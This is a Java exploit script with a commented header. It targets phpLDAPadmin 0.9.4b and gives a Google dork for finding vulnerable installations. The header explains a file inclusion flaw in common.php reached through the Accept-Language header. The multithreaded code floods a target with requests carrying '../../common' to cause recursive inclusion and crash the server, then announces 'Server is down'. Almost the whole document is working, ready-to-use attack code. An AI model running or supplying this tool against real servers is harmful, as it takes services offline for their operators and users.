/** * Exploit Title: phpLDAPadmin 0.9.4b DoS * Google Dork: "phpLDAPadmin - 0.9.4b" * Date: 2011-10-23 * Author: Alguien * Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/ * Version: 0.9.4b * Tested on: Red Hat * CVE : - * * Compilation: * ------------ * $ javac phpldos.java * * Usage: * ------ * $ java phpldos <host> <path> <threads> * * Example: * -------- * $ java phpldos www.example.com /phpldapadmin/ 10 * * Explanation: * ------------ * The file "common.php" is vulnerable to LFI through the "Accept-Language" * HTTP header. * * if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) { * // get the languages which are spetcified in the HTTP header * $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); * $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); * foreach( $HTTP_LANGS2 as $key => $value ) { * $value=preg_split ("/[-]+/", $value ); * $HTTP_LANGS2[$key]=$value[0]; * } * * $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2); * foreach( $HTTP_LANGS as $HTTP_LANG) { * // try to grab one after the other the language file * if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) && * is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) { * ob_start(); * include realpath( "lang/recoded/$HTTP_LANG.php" ); * ob_end_clean(); * break; * } * } * } * * This exploit sends "../../common" in the Accept-Language header in order to * generate a recursive inclusions and cause a denial of service via resource * exhaustion. * * GET /phpldapadmin/common.php HTTP/1.1\r\n * Host: www.example.com\r\n * Accept-Language: ../../common\r\n * Connection: close\r\n * \r\n * */ import java.io.PrintStream; import java.net.InetSocketAddress; import java.net.Socket; class phpldos implements Runnable { public static final int HTTP_PORT = 80; public static final int TIMEOUT = 10000; private static String host; private static String path; private Socket sk; private PrintStream ps; public void run() { while (true) { if (!open_connection()) { System.out.println("[+] Mission complete. Server is down };]"); break; } send_attack(); try { ps.close(); sk.close(); } catch (Exception e) { // D'oh! } } } private boolean open_connection() { try { sk = new Socket(); sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT); ps = new PrintStream(sk.getOutputStream()); } catch (Exception e) { return false; } return true; } private void send_attack() { try { String message = "" + "GET " + path + "common.php HTTP/1.1\r\n" + "Host: " + host + "\r\n" + "Accept-Language: ../../common\r\n" + "Connection: close\r\n" + "\r\n"; ps.print(message); } catch (Exception e) { // D'oh! } } public static void main(String[] args) { if (args.length != 3) { usage(); } host = args[0]; path = args[1]; int threads = Integer.parseInt(args[2]); System.out.println("[+] Attacking with " + threads + " threads."); for (int i = 0; i < threads; i++) { new Thread(new phpldos()).start(); } } public static void usage() { System.out.print( "###########################################################\n" + "# phpLDAPadmin DoS #\n" + "# by: Alguien - http://alguienenlafisi.blogspot.com #\n" + "###########################################################\n" + "Syntax : java phpldos <host> <path> <threads>\n" + "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n"); System.exit(1); } }